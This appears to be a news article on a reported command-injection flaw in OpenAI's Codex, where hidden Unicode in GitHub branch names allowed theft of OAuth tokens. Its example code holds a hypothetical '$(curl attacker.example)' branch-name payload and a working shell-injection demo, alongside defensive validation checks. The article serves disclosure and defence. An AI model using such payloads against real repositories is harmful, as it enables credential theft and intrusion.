UK Tech Insider

AI Ethics & Regulation

    OpenAI Codex Vulnerability Allowed Attackers to Steal GitHub Tokens

By Declan Murphy | March 30, 2026

BeyondTrust Phantom Labs researchers have revealed a critical command injection vulnerability in OpenAI's Codex. The flaw allowed attackers to steal sensitive GitHub OAuth tokens using hidden Unicode characters in branch names, potentially compromising entire enterprise environments.

A significant security vulnerability has been identified in OpenAI's Codex, a tool used by countless developers to assist in writing and reviewing code. The flaw could have allowed hackers to steal GitHub access tokens, the keys that grant full control over a person's or an organisation's private code repositories.

These findings come from researchers at BeyondTrust Phantom Labs, who found that a simple lack of input sanitization could turn a coding assistant into a potential doorway for data theft.

The Invisible Branch Trick

For context, tools like Codex need a token to access a programmer's work. Phantom Labs researchers discovered that the system didn't properly validate user data, allowing command injection through the GitHub branch name. Further probing revealed that attackers could hide malicious instructions using an Ideographic Space, a special Unicode character that looks like a normal space to the human eye.
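As an illustrative sketch (not the actual exploit), the snippet below shows how an Ideographic Space (U+3000) lets a branch name pass a casual visual check while smuggling extra content, and how a strict allow-list check would reject it. The payload string and the validation regex are assumptions for demonstration only.

```python
import re

# Illustrative sketch, not the actual exploit. "\u3000" is the
# Ideographic Space: it renders like a normal space, so this branch
# name looks like "main" followed by harmless text.
malicious = "main\u3000$(curl attacker.example)"  # hypothetical payload

def is_safe_branch_name(name: str) -> bool:
    """Allow-list check: permit only common ASCII branch characters."""
    return re.fullmatch(r"[A-Za-z0-9._/-]+", name) is not None

print(is_safe_branch_name("main"))     # True
print(is_safe_branch_name(malicious))  # False: hidden Unicode rejected
```

An allow-list is deliberately blunt here: rather than enumerating every confusable Unicode character, it accepts only characters that legitimate branch names need.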

While a developer might assume they are viewing a standard branch named main, a hidden command could be running in the background. "When user-controlled input is passed into these environments without strict validation, the result is not just a bug, it's a scalable attack path," the researchers noted in the blog post shared with Hackread.com. In testing, they successfully forced the system to reveal secret login tokens in plain text.
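A minimal sketch of the underlying vulnerability class, assuming POSIX shell semantics: interpolating an untrusted branch name into a shell command lets the shell interpret the attacker's ";", whereas passing an argv list keeps the whole name as a single argument. The echo command here is a stand-in for whatever git operation a tool might run.

```python
import subprocess

# Hypothetical attacker-controlled branch name; "\u3000" renders like
# an ordinary space to the human eye.
branch = "main\u3000; echo INJECTED"

# Vulnerable pattern: the shell parses the attacker's ";" and runs a
# second command.
bad = subprocess.run(f"echo {branch}", shell=True,
                     capture_output=True, encoding="utf-8")

# Safer pattern: an argv list passes the whole branch name as one
# argument, so nothing is shell-interpreted.
good = subprocess.run(["echo", branch],
                      capture_output=True, encoding="utf-8")

print(bad.stdout)   # second line is "INJECTED" -- the injection ran
print(good.stdout)  # the literal branch name, uninterpreted
```

The fix reported for Codex was stronger protection around shell commands; avoiding shell string interpolation entirely is the classic defence for this class of bug.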

Scaling the Attack

Researchers note this was not just a threat to individual users, as the flaw affected the ChatGPT website, the Codex SDK, and various developer extensions. If a hacker changed a project's default branch to a malicious version, anyone opening it could have their credentials exfiltrated.

Also worth noting is that the risk extended beyond the cloud. The team, led by Director of Research Fletcher Davis, found that Codex stores sensitive login data in a file called auth.json on a user's local computer. If a hacker accessed a developer's machine, they could lift these tokens to move through an entire organisation's GitHub environment.
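Because the local auth.json is itself a theft target, one basic hardening step is to ensure the file is readable only by its owner. A hedged sketch follows; the ~/.codex/auth.json path is a guess, since the article names only the file.

```python
import os
import stat
import tempfile
from pathlib import Path

def is_owner_only(path: Path) -> bool:
    """True if the file exists and has no group/other permission bits set."""
    try:
        mode = stat.S_IMODE(path.stat().st_mode)
    except FileNotFoundError:
        return False
    return (mode & (stat.S_IRWXG | stat.S_IRWXO)) == 0

# Guessed location for the credentials file the article describes.
codex_auth = Path.home() / ".codex" / "auth.json"
if codex_auth.exists() and not is_owner_only(codex_auth):
    print("warning: auth.json is readable by other users")
```

On a developer machine a check like this could run from a shell profile or a CI hook; `chmod 600 auth.json` closes the gap it reports, though it does nothing against an attacker who already runs as that user.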

Codex attack path (Source: BeyondTrust)

A Rapid Response

Fortunately, the Phantom Labs team was quick to report the flaw to OpenAI on 16 December 2025, which led to an initial hotfix just a week later on 23 December. By 30 January 2026, OpenAI had implemented stronger protections for shell commands and restricted the access these tokens carry, ultimately labelling the issue a "Critical Priority 1" vulnerability on 5 February.

OpenAI has since confirmed the fixes are complete, thanking the researchers for their partnership. Still, this serves as a reminder to be careful with AI tools: they aren't just assistants but live environments with high-level access to our most sensitive data.


